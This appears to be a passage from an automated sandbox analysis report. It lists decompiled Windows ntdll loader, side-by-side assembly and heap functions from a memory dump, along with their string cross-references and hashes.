Function 36B1631F Relevance: 7.8, Strings: 6, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E36B1631F(intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _t71;
				void* _t73;
				signed int _t77;
				signed int _t79;
				char* _t84;
				intOrPtr _t85;
				signed int _t86;
				signed int _t88;
				signed char* _t89;
				void* _t99;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed char _t109;
				void* _t111;
				intOrPtr _t112;
				intOrPtr _t116;
				intOrPtr _t124;
				intOrPtr _t127;
				signed char _t130;
				signed int _t132;
				signed int _t133;
				intOrPtr _t136;
				void* _t138;
				signed int* _t140;
				signed short _t141;
				signed int _t145;
				void* _t147;
				signed int _t148;
				signed int _t149;
				void* _t151;
				void* _t153;

				_push(__esi);
				_push(__edi);
				_t145 = __edx;
				_t136 = __ecx;
				if( *0x36bd68d4 == 0) {
					E36B61419();
				}
				_t71 =  *[fs:0x18];
				if(( *(_t71 + 0xfca) & 0x00004000) != 0) {
					return _t71;
				} else {
					_t116 = _t136;
					_t132 = _t145;
					_pop(_t138);
					_pop(_t147);
					_push("true");
					_push(0x36bbc780);
					E36B37BE4(_t111, _t138, _t147);
					 *(_t151 - 0x28) = _t132;
					 *((intOrPtr*)(_t151 - 0x20)) = _t116;
					_t112 =  *[fs:0x18];
					 *((intOrPtr*)(_t151 - 0x30)) = _t112;
					_t148 = 0;
					 *(_t151 - 0x24) = 0;
					while(1) {
						L6:
						_t133 = 0x2000;
						_t118 = 1;
						_t73 = 0;
						asm("lock cmpxchg [edi], ecx");
						if(0 != 1 || ( *(_t112 + 0xfca) & 0x00002000) != 0) {
							goto L8;
						}
						L44:
						_t104 =  *0x36bd5d50;
						__eflags = _t104;
						if(_t104 == 0) {
							L51:
							 *((intOrPtr*)(_t151 - 0x40)) = 0xfffb6c20;
							_t55 = _t151 - 0x3c;
							 *_t55 =  *(_t151 - 0x3c) | 0xffffffff;
							__eflags =  *_t55;
							while(1) {
								__eflags =  *0x36bd5db0 - 1;
								if(__eflags != 0) {
									goto L6;
								}
								_push(_t151 - 0x40);
								_push(_t148);
								_t106 = E36B22CF0();
								__eflags = _t106;
								if(_t106 < 0) {
									_t130 =  *0x36bd37c0; // 0x0
									__eflags = _t130 & 0x00000003;
									if((_t130 & 0x00000003) != 0) {
										E36B5E692("minkernel\\ntdll\\ldrinit.c", 0x615, "_LdrpInitialize", "true", "Delaying execution failed with status 0x%08lx\n", _t106);
										_t153 = _t153 + 0x18;
										_t130 =  *0x36bd37c0; // 0x0
									}
									__eflags = _t130 & 0x00000040;
									if((_t130 & 0x00000040) != 0) {
										asm("int3");
									}
								}
							}
							continue;
						} else {
							_push(_t148);
							_push(_t148);
							_push(_t104);
							_t108 = E36B229D0();
							_t118 = _t108;
							__eflags = _t108;
							if(__eflags < 0) {
								_t109 =  *0x36bd37c0; // 0x0
								__eflags = _t109 & 0x00000003;
								if((_t109 & 0x00000003) != 0) {
									E36B5E692("minkernel\\ntdll\\ldrinit.c", 0x604, "_LdrpInitialize", "true", "NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop\n", _t118);
									_t153 = _t153 + 0x18;
									_t109 =  *0x36bd37c0; // 0x0
								}
								__eflags = _t109 & 0x00000040;
								if((_t109 & 0x00000040) != 0) {
									asm("int3");
								}
								goto L51;
							} else {
								_t73 =  *0x36bd5db0; // 0x2
							}
						}
						L8:
						_t140 =  *(_t112 + 0x30);
						if(_t73 == 0) {
							_push(_t148);
							_push(_t148);
							_push(_t148);
							_push(0x1f0003);
							_push(0x36bd5d50);
							E36B22E30();
							 *(_t112 + 0xfca) =  *(_t112 + 0xfca) | 0x00000020;
							_t140[0x28] = 0x36bd3390;
							 *0x36bd65f4 = _t148;
							 *(_t151 - 0x34) =  &(_t140[0xa]);
							asm("lock bts dword [eax], 0x1");
							_t149 = E36B64F99();
							__eflags = _t149;
							if(_t149 >= 0) {
								 *(_t151 - 4) =  *(_t151 - 4) & 0x00000000;
								_t77 = _t140[4];
								 *(_t151 - 0x38) = _t77;
								__eflags =  *(_t77 + 8);
								if(__eflags < 0) {
									 *0x36bd5d70 = 1;
									 *0x36bd5d08 = 1;
								}
								_t133 =  *(_t151 - 0x28);
								_t149 = L36B5A3F0(_t112,  *((intOrPtr*)(_t151 - 0x20)), _t133, _t140, _t149, __eflags);
								 *(_t151 - 0x1c) = _t149;
								__eflags = _t149;
								if(_t149 < 0) {
									_t79 =  *0x36bd37c0; // 0x0
									__eflags = _t79 & 0x00000003;
									if((_t79 & 0x00000003) != 0) {
										E36B5E692("minkernel\\ntdll\\ldrinit.c", 0x678, "_LdrpInitialize", 0, "Process initialization failed with status 0x%08lx\n", _t149);
										_t79 =  *0x36bd37c0; // 0x0
									}
									__eflags = _t79 & 0x00000010;
									if((_t79 & 0x00000010) != 0) {
										asm("int3");
									}
									 *(_t151 - 4) = 0xfffffffe;
									goto L14;
								} else {
									__eflags =  *0x36bd68d0;
									if( *0x36bd68d0 != 0) {
										 *(_t151 - 4) = 0xfffffffe;
										goto L18;
									} else {
										_t124 =  *0x36bd5b24; // 0x68b2ce0
										_t24 = _t124 + 0x24; // 0x68b2d04
										_t133 = _t24;
										_t25 = _t124 + 0x18; // 0x400000
										E36AFDF36( *_t25, _t133, 0x14ae);
										_t126 = _t140[0x82];
										__eflags = _t140[0x82];
										if(__eflags != 0) {
											_t149 = E36B63BA3(_t112, _t126, _t140, _t149, __eflags);
											 *(_t151 - 0x1c) = _t149;
										}
										 *(_t151 - 4) = 0xfffffffe;
										_t141 = 0x2000;
										 *0x36bd65f4 = 3;
										asm("lock btr dword [eax], 0x1");
										_t127 =  *0x36bd670c; // 0x68b32b0
										E36B164BE(_t127);
										__eflags = _t149;
										if(_t149 < 0) {
											goto L67;
										} else {
											_t79 = E36B1648A(_t133);
											goto L15;
										}
									}
								}
							} else {
								_t79 =  *0x36bd37c0; // 0x0
								__eflags = _t79 & 0x00000003;
								if((_t79 & 0x00000003) != 0) {
									E36B5E692("minkernel\\ntdll\\ldrinit.c", 0x660, "_LdrpInitialize", 0, "LDR:MRDATA: Process initialization failed with status 0x%08lx\n", _t149);
									_t79 =  *0x36bd37c0; // 0x0
								}
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) != 0) {
									asm("int3");
								}
								goto L14;
							}
						} else {
							 *(_t151 - 0x1c) = _t148;
							if( *0x36bd68d0 != 0) {
								L18:
								 *[fs:0x0] =  *((intOrPtr*)(_t151 - 0x10));
								return _t79;
							} else {
								if( *_t140 != 0) {
									_t148 = 0;
									 *0x36bd5d50 = 0;
									_t118 = 1;
									_t99 = 2;
									_t133 = 0x36bd5db0;
									asm("lock cmpxchg [edx], ecx");
									__eflags = _t99 - 2;
									if(_t99 == 2) {
										__eflags =  *_t140;
										if( *_t140 == 0) {
											_t149 =  *(_t151 - 0x1c);
											goto L62;
										} else {
											_t79 = E36B61B93();
											_t149 = _t79;
											__eflags = _t149;
											if(__eflags >= 0) {
												L62:
												_t79 = E36B1648A(_t133);
											} else {
											}
											goto L11;
										}
										goto L15;
									} else {
										goto L44;
									}
								} else {
									L11:
									if(( *(_t112 + 0xfca) & 0x00000040) == 0) {
										_t166 =  *0x36bd5a85;
										if( *0x36bd5a85 != 0) {
											_t140 = 0x36bd67b4;
											L36AE53C0(0x36bd67b4);
											while(1) {
												__eflags =  *0x36bd5a85;
												if( *0x36bd5a85 == 0) {
													break;
												}
												L36AF21D0(0x36bd67b8, _t140, 0, "true");
											}
											E36AE52F0(_t118, _t140);
										}
										_t79 = E36AFDA59(_t112,  *((intOrPtr*)(_t151 - 0x20)), _t140, _t149, _t166);
									}
									L14:
									_t141 = 0x2000;
									L15:
									if(_t149 < 0) {
										L67:
										_t120 = _t149;
										E36B61D5E(_t149);
										_push(_t149);
										_push(0xffffffff);
										_t79 = E36B22C70();
										__eflags =  *(_t151 - 0x24);
										if( *(_t151 - 0x24) != 0) {
											goto L18;
										} else {
											E36B38AA0(_t120, _t133, _t149);
											asm("int3");
											_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
											__eflags =  *_t84;
											if( *_t84 != 0) {
												_t85 =  *[fs:0x30];
												__eflags =  *(_t85 + 0x240) & 0x00000004;
												if(( *(_t85 + 0x240) & 0x00000004) != 0) {
													_t88 = E36AF3C40();
													__eflags = _t88;
													if(_t88 == 0) {
														_t89 = 0x7ffe0385;
													} else {
														_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													}
													__eflags =  *_t89 & 0x00000020;
													if(( *_t89 & 0x00000020) != 0) {
														E36B60227(0x1484, _t133 | 0xffffffff, _t133 | 0xffffffff, _t133 | 0xffffffff, 0, 0);
													}
												}
											}
											asm("lock inc dword [0x36bd5db0]");
											_t86 =  *0x36bd5d50;
											__eflags = _t86;
											if(_t86 != 0) {
												_push(0);
												_push(_t86);
												return E36B22A70();
											}
											return _t86;
										}
									} else {
										if(( *(_t112 + 0xfca) & _t141) == 0) {
											_t79 = E36B245B0();
										}
										goto L18;
									}
								}
							}
						}
						goto L76;
					}
				}
				L76:
			}

0x36b16326
0x36b16327
0x36b16328
0x36b1632a
0x36b1632c
0x36b1634d
0x36b1634d
0x36b1632e
0x36b16340
0x36b16356
0x36b16342
0x36b16342
0x36b16344
0x36b16346
0x36b16347
0x36b16357
0x36b16359
0x36b1635e
0x36b16363
0x36b16366
0x36b16369
0x36b16370
0x36b16373
0x36b16375
0x36b1637d
0x36b1637d
0x36b1637d
0x36b16384
0x36b16385
0x36b16387
0x36b1638e
0x00000000
0x00000000
0x36b53fde
0x36b53fde
0x36b53fe3
0x36b53fe5
0x36b54031
0x36b54031
0x36b54038
0x36b54038
0x36b54038
0x36b5403c
0x36b5403c
0x36b54043
0x00000000
0x00000000
0x36b5404c
0x36b5404d
0x36b5404e
0x36b54053
0x36b54055
0x36b54057
0x36b5405d
0x36b54060
0x36b54079
0x36b5407e
0x36b54081
0x36b54081
0x36b54087
0x36b5408a
0x36b5408c
0x36b5408c
0x36b5408a
0x36b54055
0x00000000
0x36b53fe7
0x36b53fe7
0x36b53fe8
0x36b53fe9
0x36b53fea
0x36b53fef
0x36b53ff1
0x36b53ff3
0x36b53fff
0x36b54004
0x36b54006
0x36b5401f
0x36b54024
0x36b54027
0x36b54027
0x36b5402c
0x36b5402e
0x36b54030
0x36b54030
0x00000000
0x36b53ff5
0x36b53ff5
0x36b53ff5
0x36b53ff3
0x36b1639d
0x36b1639d
0x36b163a2
0x36b53e99
0x36b53e9a
0x36b53e9b
0x36b53e9c
0x36b53ea1
0x36b53ea6
0x36b53eab
0x36b53eb3
0x36b53ebd
0x36b53ec6
0x36b53ec9
0x36b53ed3
0x36b53ed5
0x36b53ed7
0x36b53f14
0x36b53f18
0x36b53f1b
0x36b53f1e
0x36b53f22
0x36b53f28
0x36b53f2f
0x36b53f2f
0x36b16406
0x36b16411
0x36b16413
0x36b16416
0x36b16418
0x36b53f3b
0x36b53f40
0x36b53f42
0x36b53f5b
0x36b53f63
0x36b53f63
0x36b53f68
0x36b53f6a
0x36b53f6c
0x36b53f6c
0x36b53f6d
0x00000000
0x36b1641e
0x36b1641e
0x36b16425
0x36b53f79
0x00000000
0x36b1642b
0x36b16430
0x36b16436
0x36b16436
0x36b16439
0x36b1643c
0x36b16441
0x36b16447
0x36b16449
0x36b53f8a
0x36b53f8c
0x36b53f8c
0x36b1644f
0x36b16456
0x36b1645b
0x36b16468
0x36b1646d
0x36b16473
0x36b16478
0x36b1647a
0x00000000
0x36b16480
0x36b16480
0x00000000
0x36b16480
0x36b1647a
0x36b16425
0x36b53ed9
0x36b53ed9
0x36b53ede
0x36b53ee0
0x36b53ef9
0x36b53f01
0x36b53f01
0x36b53f06
0x36b53f08
0x36b53f0e
0x36b53f0e
0x00000000
0x36b53f08
0x36b163a8
0x36b163a8
0x36b163b2
0x36b163f6
0x36b163f9
0x36b16405
0x36b163b4
0x36b163b7
0x36b53fbc
0x36b53fbe
0x36b53fc6
0x36b53fc9
0x36b53fca
0x36b53fcf
0x36b53fd3
0x36b53fd6
0x36b54091
0x36b54093
0x36b540a5
0x00000000
0x36b54095
0x36b54095
0x36b5409a
0x36b5409c
0x36b5409e
0x36b540a8
0x36b540a8
0x00000000
0x36b540a0
0x00000000
0x36b5409e
0x00000000
0x36b53fdc
0x00000000
0x36b53fdc
0x36b163bd
0x36b163bd
0x36b163c4
0x36b163c6
0x36b163cd
0x36b540b2
0x36b540b8
0x36b540bd
0x36b540bd
0x36b540c4
0x00000000
0x00000000
0x36b540d0
0x36b540d0
0x36b540d8
0x36b540d8
0x36b163d6
0x36b163d6
0x36b163db
0x36b163db
0x36b163e0
0x36b163e2
0x36b540e2
0x36b540e2
0x36b540e4
0x36b540e9
0x36b540ea
0x36b540ec
0x36b540f1
0x36b540f5
0x00000000
0x36b540fb
0x36b540fc
0x36b54101
0x36b5410b
0x36b1649c
0x36b1649f
0x36b54115
0x36b5411b
0x36b54122
0x36b54128
0x36b5412d
0x36b5412f
0x36b54141
0x36b54131
0x36b5413a
0x36b5413a
0x36b54146
0x36b54149
0x36b5415d
0x36b5415d
0x36b54149
0x36b54122
0x36b164a5
0x36b164ac
0x36b164b1
0x36b164b3
0x36b164b5
0x36b164b7
0x00000000
0x36b164b8
0x36b164bd
0x36b164bd
0x36b163e8
0x36b163ef
0x36b163f1
0x36b163f1
0x00000000
0x36b163ef
0x36b163e2
0x36b163b7
0x36b163b2
0x00000000
0x36b163a2
0x36b1637d
0x00000000

Strings

Delaying execution failed with status 0x%08lx, xrefs: 36B54063
Process initialization failed with status 0x%08lx, xrefs: 36B53F45
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 36B54009
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 36B53EE3
minkernel\ntdll\ldrinit.c, xrefs: 36B53EF4, 36B53F56, 36B5401A, 36B54074
_LdrpInitialize, xrefs: 36B53EEA, 36B53F4C, 36B54010, 36B5406A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 8edaa0c00e1bafbe55eb2475b487ca178892095656d43d8a74d55a301b001d36
Instruction ID: 12ec89f0ed3fd61e460309d07d5357ac675c2418155400ef63a5490876e95557
Opcode Fuzzy Hash: 8edaa0c00e1bafbe55eb2475b487ca178892095656d43d8a74d55a301b001d36
Instruction Fuzzy Hash: F8910975E01364EBE7248F25DC64F997BB1EB01754F25005AEB04AF280EB789852CFB6

Uniqueness

Uniqueness Score: -1.00%

Function 36B12594 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E36B12594(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x36ab120c) {
					E36B6EF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(E36B12C10);
						_push(_t34);
						_push(_t41);
						_push(_t35);
						E36B6EF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E36B1265C(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E36B6EF10(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = E36B12919(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E36B6EF10();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}

0x36b12594
0x36b12594
0x36b1259c
0x36b125a6
0x36b125a9
0x36b125ac
0x36b125b6
0x36b51f77
0x00000000
0x36b125bc
0x36b125bc
0x36b125c1
0x36b125c3
0x36b125c3
0x36b125c5
0x36b125ce
0x36b51fbc
0x36b51fc1
0x36b51fc2
0x36b51fc3
0x36b51fd1
0x00000000
0x36b125e5
0x36b125fc
0x36b12600
0x36b51f81
0x36b51f82
0x00000000
0x36b12606
0x36b12606
0x36b1260b
0x36b1264a
0x36b1264a
0x36b1260d
0x36b1260d
0x36b12612
0x36b12655
0x36b12655
0x36b12614
0x36b12614
0x36b12619
0x00000000
0x36b1261b
0x36b1261e
0x36b51fa0
0x36b51fa3
0x36b51fb2
0x36b51fd9
0x36b51fd9
0x36b12624
0x36b1262e
0x36b12632
0x36b51f89
0x36b51f8a
0x36b51f8f
0x36b51f8f
0x36b51f91
0x36b51f93
0x36b12638
0x36b1263e
0x36b12643
0x00000000
0x36b12645
0x36b12648
0x00000000
0x36b12648
0x36b12643
0x36b12632
0x36b1261e
0x36b12619
0x36b12612
0x36b1260b
0x36b12600
0x36b125ce
0x36b12652

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 36B51FC9
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 36B51F8A
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 36B51FA9
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 36B51F82
SXS: %s() passed the empty activation context, xrefs: 36B51F6F
RtlGetAssemblyStorageRoot, xrefs: 36B51F6A, 36B51FA4, 36B51FC4

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 396484a5accaaa4df507cadb925358642990a9a780009bebc525ab798541107e
Instruction ID: fec94c056ffe0ca0f3a50b9172ea50c5cbc3a44ed5b992144523b51703eabfd7
Opcode Fuzzy Hash: 396484a5accaaa4df507cadb925358642990a9a780009bebc525ab798541107e
Instruction Fuzzy Hash: 4331C5B6E00328BBFB108B969C44F9B7F68EB51694F0141A9BA40B7244D670EE41CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 36B1C5C6 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E36B1C5C6() {
				signed int _v8;
				signed int _v24;
				char _v92;
				char _v96;
				char _v97;
				intOrPtr _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed char _t52;
				void* _t58;
				intOrPtr _t65;
				intOrPtr* _t72;
				void* _t73;
				signed int _t75;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t79 = (_t77 & 0xfffffff8) - 0x64;
				_v8 =  *0x36bdb370 ^ _t79;
				_t72 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x2a4;
				_t75 = 0;
				if( *_t72 != 0) {
					__eflags =  *0x36bd37c0 & 0x00000005;
					if(( *0x36bd37c0 & 0x00000005) != 0) {
						E36B5E692("minkernel\\ntdll\\ldrredirect.c", 0x23c, "LdrpInitializeImportRedirection", 2, "Loading import redirection DLL: \'%wZ\'\n", _t72);
						_t79 = _t79 + 0x18;
					}
					E36B28F40( &_v92, 0, "true");
					_t79 = _t79 + 0xc;
					_t68 =  &_v92;
					_t59 = _t72;
					_t75 = E36AD6B45(_t72,  &_v92, 0x1000001,  &_v96);
					__eflags = _v24;
					if(_v24 != 0) {
						E36B0E7E0(_t59, _v92);
					}
					__eflags = _t75;
					if(__eflags >= 0) {
						_t75 = E36B64348(_v96, __eflags);
						__eflags = _t75;
						if(_t75 >= 0) {
							E36B019DF(0);
							E36B02755(_t68);
							_v97 = 0;
							_t65 =  *((intOrPtr*)(_v96 + 0x50));
							_t42 = E36B01934(_t65, 0,  &_v97);
							_push(_t65);
							_t75 = _t42;
							_push(_t75);
							_t68 = 2;
							E36B0270D(_t68);
							E36B179F9();
							__eflags = _t75;
							if(_t75 >= 0) {
								 *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) =  *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) | 0xffffffff;
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x50)))) - 0x1c)) = 0xffff;
								E36B605C6(_v100, _t68);
								 *0x36bd5c9c = _v100;
							}
						} else {
							_t52 =  *0x36bd37c0; // 0x0
							__eflags = _t52 & 0x00000003;
							if((_t52 & 0x00000003) != 0) {
								E36B5E692("minkernel\\ntdll\\ldrredirect.c", 0x257, "LdrpInitializeImportRedirection", 0, "Unable to build import redirection Table, Status = 0x%x\n", _t75);
								_t52 =  *0x36bd37c0; // 0x0
								_t79 = _t79 + 0x18;
							}
							__eflags = _t52 & 0x00000010;
							if((_t52 & 0x00000010) != 0) {
								asm("int3");
							}
						}
					}
				}
				_pop(_t73);
				_pop(_t76);
				_pop(_t58);
				return E36B24B50(_t75, _t58, _v8 ^ _t79, _t68, _t73, _t76);
			}

0x36b1c5ce
0x36b1c5d8
0x36b1c5ea
0x36b1c5f0
0x36b1c5f5
0x36b57f71
0x36b57f78
0x36b57f91
0x36b57f96
0x36b57f96
0x36b57fa1
0x36b57fa6
0x36b57fad
0x36b57fb1
0x36b57fbe
0x36b57fc0
0x36b57fc4
0x36b57fca
0x36b57fca
0x36b57fcf
0x36b57fd1
0x36b57fe0
0x36b57fe2
0x36b57fe4
0x36b58022
0x36b58027
0x36b58037
0x36b5803b
0x36b5803e
0x36b58043
0x36b58044
0x36b58046
0x36b58049
0x36b5804a
0x36b5804f
0x36b58054
0x36b58056
0x36b58068
0x36b58075
0x36b5807d
0x36b58086
0x36b58086
0x36b57fe6
0x36b57fe6
0x36b57feb
0x36b57fed
0x36b58005
0x36b5800a
0x36b5800f
0x36b5800f
0x36b58012
0x36b58014
0x36b5801a
0x36b5801a
0x36b58014
0x36b57fe4
0x36b57fd1
0x36b1c601
0x36b1c602
0x36b1c603
0x36b1c60e

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 36B57F8C, 36B58000
Unable to build import redirection Table, Status = 0x%x, xrefs: 36B57FF0
LdrpInitializeImportRedirection, xrefs: 36B57F82, 36B57FF6
Loading import redirection DLL: '%wZ', xrefs: 36B57F7B
LdrpInitializeProcess, xrefs: 36B1C5E4
minkernel\ntdll\ldrinit.c, xrefs: 36B1C5E3

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 4a95e6ac168a7e7e9f5f7aa1ee8c17905c32852687c479e0793ad70e924798e8
Instruction ID: 71064e12ee27c1570eb28330e2c093544259dac8ba11dcd9a6f53ad3145a3025
Opcode Fuzzy Hash: 4a95e6ac168a7e7e9f5f7aa1ee8c17905c32852687c479e0793ad70e924798e8
Instruction Fuzzy Hash: 663100B1A04351AFC214DF28DC96E1ABBA4EF85710F010568FA84AB281DB24DC09CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 36AF0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E36AF0680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E36AF0ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x36bd6960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E36ADB910();
						} else {
							E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E36ADB910();
						__eflags =  *0x36bd5da8;
						if(__eflags == 0) {
							E36B9FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x36bd6d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x36bd91e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
